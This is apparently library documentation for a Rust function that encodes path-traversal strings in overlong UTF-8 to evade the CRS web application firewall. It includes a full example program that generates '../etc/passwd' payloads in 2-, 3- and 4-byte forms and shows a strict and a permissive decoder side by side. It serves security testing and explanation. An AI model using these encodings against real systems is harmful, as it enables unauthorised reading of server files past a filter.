
Function overlong_utf8_path 

pub fn overlong_utf8_path(path: &str, width: u8) -> String

Overlong UTF-8 encoding of . and / for path traversal.

CRS GitHub issue #4189 (opened 2025-07, still open): CRS does not alert on %c0%ae%c0%ae%c0%af, which is ../ with each character in its 2-byte overlong UTF-8 form. Decoders that enforce RFC 3629 reject overlong sequences as malformed, so a strictly decoding backend is unaffected; older JVMs, some C libraries and a non-trivial set of internal services decode them to the plain ASCII character anyway. WAF gap plus permissive backend equals a path traversal the WAF never sees.

width selects the overlong representation: 2 (default), 3, or 4 bytes, so . becomes %c0%ae, %e0%80%ae or %f0%80%80%ae and / becomes %c0%af, %e0%80%af or %f0%80%80%af. Some decoders check each width independently (a 2-byte overlong filter does not imply a 3- or 4-byte one), so a 3-byte overlong may pass where a 2-byte one is filtered; test each width separately against the target.
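As an added illustration (not the crate's own source, which this page does not show), the stand-alone Rust program below builds the overlong forms exactly as described above and then shows the two decoder behaviours side by side: Rust's std::str::from_utf8 rejects the bytes as malformed, while a deliberately permissive decoder, modelling the lenient backends mentioned above, turns them back into ../. The names encode_overlong_path, pct_decode, strict_utf8_accepts and permissive_utf8_decode are this example's own, the handling of widths other than 2, 3 and 4 is the example's choice, and the sample path is constructed.

```rust
// Added example: builds overlong UTF-8 forms of '.' and '/' and contrasts a
// strict decoder with a permissive one. Not the crate's own implementation.

/// Encode one ASCII byte `c` as an overlong `width`-byte UTF-8 sequence.
/// Standard layouts: 2 bytes 110xxxxx 10xxxxxx, 3 bytes 1110xxxx 10xxxxxx 10xxxxxx,
/// 4 bytes 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx. For c < 0x80 the high payload bits
/// are all zero, which is exactly what makes the sequence overlong (RFC 3629 forbids it).
fn overlong_bytes(c: u8, width: u8) -> Vec<u8> {
    let cp = c as u32;
    let cont = |shift: u32| 0x80 | ((cp >> shift) & 0x3F) as u8;
    match width {
        2 => vec![0xC0 | (cp >> 6) as u8, cont(0)],
        3 => vec![0xE0 | (cp >> 12) as u8, cont(6), cont(0)],
        4 => vec![0xF0 | (cp >> 18) as u8, cont(12), cont(6), cont(0)],
        // Example's own choice: the page does not say how the crate treats other widths.
        _ => panic!("width must be 2, 3 or 4"),
    }
}

/// Percent-encode '.' and '/' in `path` as overlong UTF-8; everything else passes through.
/// Hypothetical name; mirrors the contract documented for overlong_utf8_path.
fn encode_overlong_path(path: &str, width: u8) -> String {
    let mut out = String::with_capacity(path.len() * 4);
    for ch in path.chars() {
        if ch == '.' || ch == '/' {
            for b in overlong_bytes(ch as u8, width) {
                out.push_str(&format!("%{:02x}", b));
            }
        } else {
            out.push(ch);
        }
    }
    out
}

/// Minimal %XX decoder; malformed escapes are copied through unchanged.
fn pct_decode(s: &str) -> Vec<u8> {
    let b = s.as_bytes();
    let mut out = Vec::with_capacity(b.len());
    let mut i = 0;
    while i < b.len() {
        if b[i] == b'%' {
            if let Some(hex) = s.get(i + 1..i + 3) {
                if let Ok(v) = u8::from_str_radix(hex, 16) {
                    out.push(v);
                    i += 3;
                    continue;
                }
            }
        }
        out.push(b[i]);
        i += 1;
    }
    out
}

/// Strict decoding: Rust's std rejects overlong sequences outright.
fn strict_utf8_accepts(bytes: &[u8]) -> bool {
    std::str::from_utf8(bytes).is_ok()
}

/// Deliberately permissive decoder modelling a lenient backend: it trusts the lead
/// byte's length and reassembles the payload bits without the overlong check (and
/// without validating continuation bytes), so C0 AE comes back as '.'.
fn permissive_utf8_decode(bytes: &[u8]) -> String {
    let mut out = String::new();
    let mut i = 0;
    while i < bytes.len() {
        let b = bytes[i];
        let (len, init) = match b {
            0x00..=0x7F => (1, b as u32),
            0xC0..=0xDF => (2, (b & 0x1F) as u32),
            0xE0..=0xEF => (3, (b & 0x0F) as u32),
            0xF0..=0xF7 => (4, (b & 0x07) as u32),
            _ => { out.push('\u{FFFD}'); i += 1; continue; }
        };
        if i + len > bytes.len() { out.push('\u{FFFD}'); break; }
        let cp = bytes[i + 1..i + len]
            .iter()
            .fold(init, |acc, &c| (acc << 6) | (c & 0x3F) as u32);
        out.push(char::from_u32(cp).unwrap_or('\u{FFFD}'));
        i += len;
    }
    out
}

fn main() {
    // Constructed sample path.
    for &width in &[2u8, 3, 4] {
        let enc = encode_overlong_path("../etc/passwd", width);
        let raw = pct_decode(&enc);
        println!(
            "width {}: {} strict_ok={} permissive={:?}",
            width, enc, strict_utf8_accepts(&raw), permissive_utf8_decode(&raw)
        );
    }
}
```

Running it prints one line per width: the strict decoder returns false for every overlong form, while the permissive one yields "../etc/passwd" each time, which is the WAF-bypass condition the issue above describes. The permissive decoder is only a model of the failure mode; real lenient backends differ in which widths they accept, hence the advice to try each width.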